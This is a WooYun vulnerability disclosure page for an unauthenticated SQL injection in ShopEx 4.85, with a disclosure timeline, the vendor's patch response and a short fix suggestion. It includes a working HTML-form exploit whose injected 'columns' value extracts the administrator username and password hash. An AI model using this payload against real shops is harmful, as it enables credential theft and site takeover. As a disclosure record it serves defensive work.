当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032753

漏洞标题:ShopEx4.85最新版本SQL注入【1】

相关厂商:ShopEx

漏洞作者: hawkish001

提交时间:2013-07-29 23:24

修复时间:2013-10-27 23:24

公开时间:2013-10-27 23:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-29: 细节已通知厂商并且等待厂商处理中
2013-07-30: 厂商已经确认,细节仅向厂商公开
2013-08-02: 细节向第三方安全合作伙伴开放
2013-09-23: 细节向核心白帽子及相关领域专家公开
2013-10-03: 细节向普通白帽子公开
2013-10-13: 细节向实习白帽子公开
2013-10-27: 细节向公众公开

简要描述:

ShopEx4.85最新版本SQL注入,无需登录,过GPC,可直接查询管理员密码并回显

详细说明:

啥都不说了,直接上利用代码,将下面的html另存为一个html文件,修改localhost部分为站点的真实地址:

<form method='post' action='http://localhost/shopex4.85/api.php?act=search_dly_type&api_version=1.0'>
columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br />
<input type='submit' value='submit' /><br />
</form>
<script>
//document.forms[0].submit()
</script>


漏洞证明:

shopex.jpg

修复方案:

过滤,整型数据请用intval()

版权声明:转载请注明来源 hawkish001@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-07-30 08:58

厂商回复:

该问题已经处理 补丁包:485safe20130708.zip
请升级补丁包
非常感谢您为shopex信息安全做的贡献

最新状态:

暂无